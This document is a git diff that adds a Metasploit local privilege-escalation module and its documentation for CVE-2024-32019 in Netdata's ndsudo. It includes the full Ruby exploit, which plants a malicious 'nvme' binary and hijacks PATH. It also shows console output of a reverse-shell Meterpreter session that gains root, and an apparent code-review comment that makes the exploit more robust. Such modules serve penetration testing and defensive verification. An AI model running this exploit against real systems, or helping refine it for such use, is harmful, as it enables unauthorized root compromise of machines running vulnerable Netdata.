diff --git a/documentation/modules/exploit/linux/local/ndsudo_cve_2024_32019.md b/documentation/modules/exploit/linux/local/ndsudo_cve_2024_32019.md new file mode 100644 index 0000000000000..cde4c03306a94 --- /dev/null +++ b/documentation/modules/exploit/linux/local/ndsudo_cve_2024_32019.md 
@@ -0,0 +1,60 @@ +## Vulnerable Application + +The `ndsudo` is a tool shipped with Netdata Agent. Versions v1.45.0 and below contain a vulnerability, which allows an attacker to gain privilege escalation using the `ndsudo` binary. The vulnerability is an untrusted search path. When searching for additional binary files, such as `nvme`, an attacker can create a malicious binary with same name and add the directory of this binary into the `$PATH` variable. The `ndsudo` will trust the first occurrence of this binary and execute it. + +Installation steps: + +1. `sudo apt install cmake libelf-dev git bison flex build-essential libssl-dev pkg-config liblz4-dev libzstd-dev libbrotli-dev uuid-dev libuv1-dev` +1. `wget https://github.com/netdata/netdata-nightlies/releases/download/v1.45.0-8-nightly/netdata-latest.tar.gz` +1. `gunzip netdata-latest.tar.gz` +1. `tar -xf netdata-latest.tar` +1. `cd netdata-v1.45.0-8-g5803c7766/` +1. `sudo ./netdata-installer.sh` + +## Verification Steps + +1. Install the application +1. Start msfconsole +1. Receive a session +1. Do: `use exploit/linux/local/ndsudo_cve_2024_32019` +1. Do: `set session [session number]` +1. Do: `run` +1. Get root shell/meterpreter session + +## Options + + +### WritableDir + +A path where malicious `nvme` binary will be stored. This path will be later prepended to `$PATH` variable to achieve privilege escalation. + +### NdsudoPath + +The path to the `ndsudo` binary. + + +## Scenarios + +``` +msf exploit(linux/local/ndsudo_cve_2024_32019) > run verbose=true +[*] Started reverse TCP handler on 192.168.3.7:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. Vulnerable binary detected +[*] Creating malicious file at /tmp/nvme +[*] Writing '/tmp/nvme' (250 bytes) ... +[*] Executing.. 
+[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3090404 bytes) to 10.5.134.200 +[+] Deleted /tmp/nvme +[*] Meterpreter session 3 opened (192.168.3.7:4444 -> 10.5.134.200:53172) at 2025-08-11 11:05:24 +0200 + +meterpreter > getuid +Server username: root +meterpreter > sysinfo +Computer : 10.5.134.200 +OS : Ubuntu 20.04 (Linux 5.13.0-1021-oem) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +``` diff --git a/modules/exploits/linux/local/ndsudo_cve_2024_32019.rb b/modules/exploits/linux/local/ndsudo_cve_2024_32019.rb new file mode 100644 index 0000000000000..e84c3847e2fb7 --- /dev/null +++ b/modules/exploits/linux/local/ndsudo_cve_2024_32019.rb 
@@ -0,0 +1,83 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Post::Linux::Kernel + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Netdata ndsudo privilege escalation', + 'Description' => %q{ + The `ndsudo` is a tool shipped with Netdata Agent. The version v1.45.0 and below contain vulnerability, which allows an attacker to gain privilege escalation using `ndsudo` binary. The vulnerability is untrusted search path, when searching for additional binary files, such as `nvme`. An attacker can create malicious binary with same name and add the directory of this binary into `$PATH` variable. The `ndsudo` will trust the first occurence of this binary and execute it. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'msutovsky-r7', # msf module + 'mia-0' # security researcher + ], + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => [ + [ 'URL', 'https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93'], + [ 'CVE', '2024-32019'] + ], + 'DisclosureDate' => '2024-04-12', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS] + } + ) + ) + + register_advanced_options [ + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), + OptString.new('NdsudoPath', [ true, 'A path to ndsudo binary on the target system', '/usr/libexec/netdata/plugins.d/ndsudo']) + ] + end + + def check + # could not find reasonable way to get version + return CheckCode::Safe('Vulnerable binary not detected, check NdsudoPath option') unless file?(datastore['NdsudoPath']) && executable?(datastore['NdsudoPath']) + return CheckCode::Unknown('Failed to run vulnerable binary, either binary is not ndsudo or user does not have right to execute ndsudo') unless cmd_exec(datastore['NdsudoPath']) == 'at least 2 parameters are needed, but 1 were given.' + + CheckCode::Appears('Vulnerable binary detected') + end + + def exploit + base_dir = datastore['WritableDir'] + if !datastore['ForceExploit'] && is_root? + fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override') + end + + unless writable? 
base_dir + fail_with(Failure::BadConfig, "#{base_dir} is not writable") + end + + executable_path = "#{base_dir}/nvme" + vprint_status("Creating malicious file at #{executable_path}") + + fail_with(Failure::PayloadFailed, 'Failed to upload malicious binary') unless upload_and_chmodx(executable_path, generate_payload_exe) + + register_files_for_cleanup(executable_path) + + vprint_status('Executing..') + + cmd_exec("PATH=#{base_dir}:$PATH '#{datastore['NdsudoPath']}' nvme-list") + end +end
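Review bot: In `exploit`, the payload is dropped at the fixed, predictable path `#{base_dir}/nvme` (by default `/tmp/nvme`) inside a world-writable directory, so another local user can pre-create that name or race the upload, and an existing foreign `/tmp/nvme` makes `upload_and_chmodx` fail or run the wrong file as root; since ndsudo only needs the file name `nvme`, put it in a fresh random subdirectory owned by the session user and prepend that directory to `PATH` instead. The same line also interpolates the operator-supplied `WritableDir` unquoted into the shell command while `NdsudoPath` is quoted, so a path with spaces or metacharacters breaks the invocation; `PATH='#{payload_dir}':$PATH` fixes that. The random directory can be registered with FileDropper (`register_dirs_for_cleanup`, which I believe the mixin provides alongside `register_files_for_cleanup`) so the "Deleted" cleanup shown in the docs still covers it. Separately, `check` pins an exact usage string from ndsudo; a wording change in a later release would turn a vulnerable target into `Unknown`, so a `start_with?`/regex match on `at least 2 parameters` would be more robust.
```ruby
# … unchanged: root / writable? checks …
# Random, session-user-owned subdirectory: avoids the predictable /tmp/nvme path
# that another local user could pre-create or race in a world-writable directory.
payload_dir = "#{base_dir}/.#{rand_text_alphanumeric(8)}"
executable_path = "#{payload_dir}/nvme"
vprint_status("Creating malicious file at #{executable_path}")
mkdir(payload_dir)
register_dirs_for_cleanup(payload_dir)

fail_with(Failure::PayloadFailed, 'Failed to upload malicious binary') unless upload_and_chmodx(executable_path, generate_payload_exe)
register_files_for_cleanup(executable_path)

vprint_status('Executing..')
# Quote the prepended directory so an operator-supplied WritableDir with spaces or
# shell metacharacters cannot break (or alter) the command.
cmd_exec("PATH='#{payload_dir}':$PATH '#{datastore['NdsudoPath']}' nvme-list")
```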